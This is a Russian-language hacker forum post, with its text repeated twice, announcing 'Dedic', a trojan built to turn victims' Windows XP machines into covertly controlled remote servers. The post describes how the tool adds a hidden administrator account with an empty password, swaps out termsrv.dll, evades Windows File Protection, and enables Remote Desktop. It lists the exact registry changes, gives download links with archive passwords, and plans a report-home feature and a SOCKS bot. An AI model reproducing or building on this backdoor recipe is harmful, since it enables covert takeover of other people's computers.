Steriosux
11.09.2007, 17:33
Была у вас тема на форуме про похожее:
http://forum.antichat.ru/threadnav36042-1-10.html
Она мне, конечно, помощь оказала хорошую )
Так вот.. писал я на вхб..., но что-то или никого не интересует такой трой или хз..
Одни пессимистические настроения, что дедики на протрояненном компе - палево ужас какое )
Может здесь кто-нить поможет потестить и что-то скажет дельное...
Тема была начата на руборде в этом топе:
_http://forum.ru-board.com/topic.cgi?forum=55&topic=2022&start=840#lt
Это чтобы не возникало сразу мыслей, что я трояны подсовываю с только что регнувшимся ником.
Все ссылки продублированы отуда, там у меня статус повыше...
Далее цитирую, частично вырезав.
Dedic v0.1
=========
Работа
=========
Софтина создает юзера с именем SystemUser и пустым паролем, добавляет его в группу "Администраторы" - название группы на русском, инглише, немецком, французком, датском, норвежском, в дальнейшем список увеличится, потом добавляет нашего юзера в список скрытых, т.е. которые не отображаются в списке при загрузке машины, а также через "Панель управления\Учетные записи пользователей", а потом включает разрешение на использование удаленного рабочего стола, если оно отключено.
Весит 41 кило, упакована FSG.
Написана на Delphi 7
(можно, конечно, переписать на асме и добиться намного меньшего размера, но это как-нить в другой раз)
http://rapidshare.com/files/54527631/dedic_v0.1.rar.html
пасс: ru-board
==================================================
v0.2
Изменения:
==========
Внутрь ехе засунул termsrv.dll (v5.1.2600.2055), она распаковывается в папку, в которой находится сам ехе (по этой причине не следует запускать прогу из /system32/, из остальных каталогов можно), дальнейшие действия происходят, как описано на ачате, т.е. замена в dllcaсhe и т.д.
Способ описанный на ачате с заменой этой dll, вполне норм..., но он не решает одной палевной вещи - сообщения "Защита файлов Windows", я внес изменение ключа
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","SfcDisable"", но сообщение все-равно вылезет, а изменения вступят в силу только после ребута, уводить машину в ребут после изменения ключа нецелесообразно, я читал топик на oszone.net про "Смерть WFP", возможно попозже продолжу опыты, чтобы отключить защиту вообще, но пока пусть будет так, как есть...
Также изменяются следующие ключи и параметры:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllowMultipleTSSessions"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core]
"EnableConcurrentSessions"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\WinStations\RDP-Tcp]
"fEnableWinStation"=dword:00000001
"MaxInstanceCount"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSAdvertise"=dword:00000001
"IdleWinStationPoolCount"=dword:00000001
"TSAppCompat"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
В топе на ачате в том key.reg слишком дофига ключей не обязательных видимо, изменял ключи, которые изменяются в TS-Free, но возможно нужны изменения еще других ключей...
Поэтому:
Требуются beta-тестеры С разными версиями винды и с разными паками ХР, возможно пропатченная длл-ка с помощью TS-Free - более работоспособна и стоит ее заменить, но тогда она нужна не с русской винды, а с инглиш..
Ну, а также вообще, как способ будет работать на разных ХР. И что стоит еще сделать.
Интересно довести все-таки прогу до более-менее логического завершения.
http://webfile.ru/1522682
пароль тот же
З.Ы. Прога никуда не лезет, выполняет только те функции, что описаны выше, но в перспективе, конечно, хочу дописать отстук на стату с сообщением IP, хотя скорее всего я просто включу этот код в сокс-бот уже готовый, только в сокс-боте придется кое-что переписать, но это так... пока идеи только )
Нужно сам способ для начала довести до ума и протестить.
http://forum.antichat.ru/threadnav36042-1-10.html
Она мне, конечно, помощь оказала хорошую )
Так вот.. писал я на вхб..., но что-то или никого не интересует такой трой или хз..
Одни пессимистические настроения, что дедики на протрояненном компе - палево ужас какое )
Может здесь кто-нить поможет потестить и что-то скажет дельное...
Тема была начата на руборде в этом топе:
_http://forum.ru-board.com/topic.cgi?forum=55&topic=2022&start=840#lt
Это чтобы не возникало сразу мыслей, что я трояны подсовываю с только что регнувшимся ником.
Все ссылки продублированы отуда, там у меня статус повыше...
Далее цитирую, частично вырезав.
Dedic v0.1
=========
Работа
=========
Софтина создает юзера с именем SystemUser и пустым паролем, добавляет его в группу "Администраторы" - название группы на русском, инглише, немецком, французком, датском, норвежском, в дальнейшем список увеличится, потом добавляет нашего юзера в список скрытых, т.е. которые не отображаются в списке при загрузке машины, а также через "Панель управления\Учетные записи пользователей", а потом включает разрешение на использование удаленного рабочего стола, если оно отключено.
Весит 41 кило, упакована FSG.
Написана на Delphi 7
(можно, конечно, переписать на асме и добиться намного меньшего размера, но это как-нить в другой раз)
http://rapidshare.com/files/54527631/dedic_v0.1.rar.html
пасс: ru-board
==================================================
v0.2
Изменения:
==========
Внутрь ехе засунул termsrv.dll (v5.1.2600.2055), она распаковывается в папку, в которой находится сам ехе (по этой причине не следует запускать прогу из /system32/, из остальных каталогов можно), дальнейшие действия происходят, как описано на ачате, т.е. замена в dllcaсhe и т.д.
Способ описанный на ачате с заменой этой dll, вполне норм..., но он не решает одной палевной вещи - сообщения "Защита файлов Windows", я внес изменение ключа
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","SfcDisable"", но сообщение все-равно вылезет, а изменения вступят в силу только после ребута, уводить машину в ребут после изменения ключа нецелесообразно, я читал топик на oszone.net про "Смерть WFP", возможно попозже продолжу опыты, чтобы отключить защиту вообще, но пока пусть будет так, как есть...
Также изменяются следующие ключи и параметры:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllowMultipleTSSessions"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core]
"EnableConcurrentSessions"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\WinStations\RDP-Tcp]
"fEnableWinStation"=dword:00000001
"MaxInstanceCount"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSAdvertise"=dword:00000001
"IdleWinStationPoolCount"=dword:00000001
"TSAppCompat"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
В топе на ачате в том key.reg слишком дофига ключей не обязательных видимо, изменял ключи, которые изменяются в TS-Free, но возможно нужны изменения еще других ключей...
Поэтому:
Требуются beta-тестеры С разными версиями винды и с разными паками ХР, возможно пропатченная длл-ка с помощью TS-Free - более работоспособна и стоит ее заменить, но тогда она нужна не с русской винды, а с инглиш..
Ну, а также вообще, как способ будет работать на разных ХР. И что стоит еще сделать.
Интересно довести все-таки прогу до более-менее логического завершения.
http://webfile.ru/1522682
пароль тот же
З.Ы. Прога никуда не лезет, выполняет только те функции, что описаны выше, но в перспективе, конечно, хочу дописать отстук на стату с сообщением IP, хотя скорее всего я просто включу этот код в сокс-бот уже готовый, только в сокс-боте придется кое-что переписать, но это так... пока идеи только )
Нужно сам способ для начала довести до ума и протестить.